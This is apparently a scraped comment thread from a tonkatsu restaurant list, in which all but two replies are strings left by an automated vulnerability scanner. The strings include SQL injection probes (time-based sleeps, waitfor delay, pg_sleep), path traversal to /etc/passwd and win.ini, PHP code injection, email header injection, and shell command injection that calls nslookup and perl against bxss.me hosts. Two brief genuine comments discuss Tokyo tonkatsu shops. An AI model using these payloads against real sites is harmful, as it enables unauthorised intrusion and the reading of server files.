.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: paul_paulpiwat
'.print(md5(31337)).'
re: paul_paulpiwat
WEB-INF/web.xml
re: paul_paulpiwat
WEB-INF\web.xml
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
-1 OR 2+973-973-1=0+0+0+1 --
re: paul_paulpiwat
-1 OR 3+973-973-1=0+0+0+1 --
re: paul_paulpiwat
-1 OR 2+438-438-1=0+0+0+1
re: paul_paulpiwat
-1 OR 3+438-438-1=0+0+0+1
re: paul_paulpiwat
-1' OR 2+477-477-1=0+0+0+1 --
re: paul_paulpiwat
-1' OR 3+477-477-1=0+0+0+1 --
re: paul_paulpiwat
-1' OR 2+433-433-1=0+0+0+1 or 'tuRLrg8E'='
re: paul_paulpiwat
-1' OR 3+433-433-1=0+0+0+1 or 'tuRLrg8E'='
re: paul_paulpiwat
-1" OR 2+25-25-1=0+0+0+1 --
re: paul_paulpiwat
-1" OR 3+25-25-1=0+0+0+1 --
re: paul_paulpiwat
if(now()=sysdate(),sleep(15),0)
re: paul_paulpiwat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: paul_paulpiwat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: paul_paulpiwat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: paul_paulpiwat
-1; waitfor delay '0:0:15' --
re: paul_paulpiwat
-1); waitfor delay '0:0:15' --
re: paul_paulpiwat
1 waitfor delay '0:0:15' --
re: paul_paulpiwat
vQOm7Pkn'; waitfor delay '0:0:15' --
re: paul_paulpiwat
-5 OR 744=(SELECT 744 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-5) OR 283=(SELECT 283 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-1)) OR 865=(SELECT 865 FROM PG_SLEEP(15))--
re: paul_paulpiwat
fPERjBox' OR 962=(SELECT 962 FROM PG_SLEEP(15))--
re: paul_paulpiwat
vPCTH184') OR 943=(SELECT 943 FROM PG_SLEEP(15))--
re: paul_paulpiwat
pTKOCh3l')) OR 107=(SELECT 107 FROM PG_SLEEP(15))--
re: paul_paulpiwat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: paul_paulpiwat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: paul_paulpiwat
'||(select 1 from (select pg_sleep(15))x)||'
re: paul_paulpiwat
''||(select 1 from (select pg_sleep(15))x)||''
re: paul_paulpiwat
1'"
re: paul_paulpiwat
@@LRk7v
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
Great list! Of the places that I have tried, my personal favorites are Tonta and Marugo. Their completely different styles make it very hard to choose just one as an overall favorite. There's just something about the breading and frying at Marugo that I find addictive, but I think that the meat and soup at Tonta are a little higher. It sounds strange to say but these days I think tonkatsu is the cuisine with perhaps the biggest gap between the best of Tokyo and what we are able to enjoy in the US, which means I crave it constantly! The only high quality tonkatsu I have ever found here is Tamafuji in Honolulu. At least here in the Bay Area there is nothing that can come close to a good place in Tokyo.
re: mirugai
yVgnQHxY
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+116-116-1=0+0+0+1
re: mirugai
-1 OR 3+116-116-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
RvQJHMSf'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 433=(SELECT 433 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 272=(SELECT 272 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 804=(SELECT 804 FROM PG_SLEEP(15))--
re: mirugai
9M9GMxZn' OR 695=(SELECT 695 FROM PG_SLEEP(15))--
re: mirugai
yr5NPdxT') OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: mirugai
MgC1QCF7')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@ottyg
re: mirugai
NCu1DY6H
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+313-313-1=0+0+0+1
re: mirugai
-1 OR 3+313-313-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
QG9gfuCQ'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 301=(SELECT 301 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 441=(SELECT 441 FROM PG_SLEEP(15))--
re: mirugai
vaVy4at5' OR 244=(SELECT 244 FROM PG_SLEEP(15))--
re: mirugai
7UqYxu9X') OR 862=(SELECT 862 FROM PG_SLEEP(15))--
re: mirugai
Gcq8BLCd')) OR 695=(SELECT 695 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@no5eh
re: mirugai
1KbxABLO
re: mirugai
%0abcc:074625.67-10238.67.0fe40.19990.2@bxss.me
re: mirugai
response.write(9972505*9458919)
re: mirugai
to@example.com>%0d%0abcc:074625.67-10239.67.0fe40.19990.2@bxss.me
re: mirugai
'+response.write(9972505*9458919)+'
re: mirugai
"+response.write(9972505*9458919)+"
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
${9999645+9999988}
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
../../../../../../../../../../../../../../../proc/version
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: mirugai
../../../../../../../../../../etc/passwd%00.jpg
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: mirugai
'.gethostbyname(lc('hitxv'.'zkycgyhqaf22d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(70).chr(97).chr(83).'
re: mirugai
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: mirugai
)
re: mirugai
".gethostbyname(lc("hitmb"."ryvwvjgmcaa51.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(90).chr(97).chr(75)."
re: mirugai
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: mirugai
!(()&&!|*|*|
re: mirugai
/etc/passwd
re: mirugai
^(#$!@#$)(()))******
re: mirugai
echo uretss$()\ texeau\nz^xyu||a #' &echo uretss$()\ texeau\nz^xyu||a #|" &echo uretss$()\ texeau\nz^xyu||a #
re: mirugai
%2fetc%2fpasswd
re: mirugai
&echo vdmtxf$()\ ybdnpj\nz^xyu||a #' &echo vdmtxf$()\ ybdnpj\nz^xyu||a #|" &echo vdmtxf$()\ ybdnpj\nz^xyu||a #
re: mirugai
/.././.././.././.././.././.././.././../etc/./passwd%00
re: mirugai
|echo obylna$()\ ejmxcq\nz^xyu||a #' |echo obylna$()\ ejmxcq\nz^xyu||a #|" |echo obylna$()\ ejmxcq\nz^xyu||a #
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: mirugai
(nslookup hitnwjbgfuuas321da.bxss.me||perl -e "gethostbyname('hitnwjbgfuuas321da.bxss.me')")
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: mirugai
$(nslookup hitwllqbiaoil8f494.bxss.me||perl -e "gethostbyname('hitwllqbiaoil8f494.bxss.me')")
re: mirugai
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: mirugai
&nslookup hitmwnshoczlc68b98.bxss.me&'\"`0&nslookup hitmwnshoczlc68b98.bxss.me&`'
re: mirugai
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(107).concat(84).concat(113).concat(69)+(require"socket"
Socket.gethostbyname("hittc"+"gnlfvpni99b39.bxss.me.")[3].to_s)+"
re: mirugai
&(nslookup hitgwfmvcuutm508c3.bxss.me||perl -e "gethostbyname('hitgwfmvcuutm508c3.bxss.me')")&'\"`0&(nslookup hitgwfmvcuutm508c3.bxss.me||perl -e "gethostbyname('hitgwfmvcuutm508c3.bxss.me')")&`'
re: mirugai
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(103).concat(83).concat(108).concat(76)+(require'socket'
Socket.gethostbyname('hitri'+'zymtpwqff22c2.bxss.me.')[3].to_s)+'
re: mirugai
|(nslookup hitxdgnhxhjpv5bcc2.bxss.me||perl -e "gethostbyname('hitxdgnhxhjpv5bcc2.bxss.me')")
re: mirugai
file:///etc/passwd
re: mirugai
http://bxss.me/t/fit.txt%3F.jpg
re: mirugai
`(nslookup hitxkbzfvmnnx9c375.bxss.me||perl -e "gethostbyname('hitxkbzfvmnnx9c375.bxss.me')")`
re: mirugai
/\../\../\../\../\../\../\../etc/passwd
re: mirugai
/etc/shells
re: mirugai
;(nslookup hitziofuioqih9fa2c.bxss.me||perl -e "gethostbyname('hitziofuioqih9fa2c.bxss.me')")|(nslookup hitziofuioqih9fa2c.bxss.me||perl -e "gethostbyname('hitziofuioqih9fa2c.bxss.me')")&(nslookup hitziofuioqih9fa2c.bxss.me||perl -e "gethostbyname('hitziofuioqih9fa2c.bxss.me')")
re: mirugai
/WEB-INF/web.xml
re: mirugai
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: mirugai
c:/windows/win.ini
re: mirugai
C:\WINDOWS\system32\drivers\etc\hosts
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
bxss.me
re: mirugai
../../../../../../../../../../windows/win.ini%00.jpg
re: mirugai
';print(md5(31337));$a='
re: mirugai
/../../../../../../../../../../boot.ini
re: mirugai
";print(md5(31337));$a="
re: mirugai
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: mirugai
${@print(md5(31337))}
re: mirugai
'"
re: mirugai
..\..\..\..\..\..\..\..\windows\win.ini
re: mirugai
${@print(md5(31337))}\
re: mirugai
<!--
re: mirugai
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: mirugai
'.print(md5(31337)).'
re: mirugai
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: mirugai
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: mirugai
WEB-INF/web.xml
re: mirugai
WEB-INF\web.xml
re: mirugai
1
re: mirugai
1
re: mirugai
-1 OR 2+468-468-1=0+0+0+1 --
re: mirugai
-1 OR 3+468-468-1=0+0+0+1 --
re: mirugai
-1 OR 2+401-401-1=0+0+0+1
re: mirugai
-1 OR 3+401-401-1=0+0+0+1
re: mirugai
-1' OR 2+274-274-1=0+0+0+1 --
re: mirugai
-1' OR 3+274-274-1=0+0+0+1 --
re: mirugai
-1' OR 2+618-618-1=0+0+0+1 or '16SDjS9L'='
re: mirugai
-1' OR 3+618-618-1=0+0+0+1 or '16SDjS9L'='
re: mirugai
-1" OR 2+55-55-1=0+0+0+1 --
re: mirugai
-1" OR 3+55-55-1=0+0+0+1 --
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
GecpTGd2'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 276=(SELECT 276 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 306=(SELECT 306 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 477=(SELECT 477 FROM PG_SLEEP(15))--
re: mirugai
KgjwVRQO' OR 210=(SELECT 210 FROM PG_SLEEP(15))--
re: mirugai
j89Yh4hi') OR 991=(SELECT 991 FROM PG_SLEEP(15))--
re: mirugai
LPV52EWc')) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
re: mirugai
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@rkTAq
re: mirugai
1
re: mirugai
1
re: mirugai
1
Hi Saito-san, should Banbu not fit on this list anymore, or did you have a bad experience lately?
re: Eric Yu
UaLVKrAX
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+950-950-1=0+0+0+1
re: Eric Yu
-1 OR 3+950-950-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
vP7jD2qy'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 756=(SELECT 756 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 122=(SELECT 122 FROM PG_SLEEP(15))--
re: Eric Yu
N591Lu1I' OR 530=(SELECT 530 FROM PG_SLEEP(15))--
re: Eric Yu
9cKIXTw6') OR 705=(SELECT 705 FROM PG_SLEEP(15))--
re: Eric Yu
v0BHTBcP')) OR 271=(SELECT 271 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@Zs38i
re: Eric Yu
74xpoISU
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+951-951-1=0+0+0+1
re: Eric Yu
-1 OR 3+951-951-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
wZnbfk96'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 867=(SELECT 867 FROM PG_SLEEP(15))--
re: Eric Yu
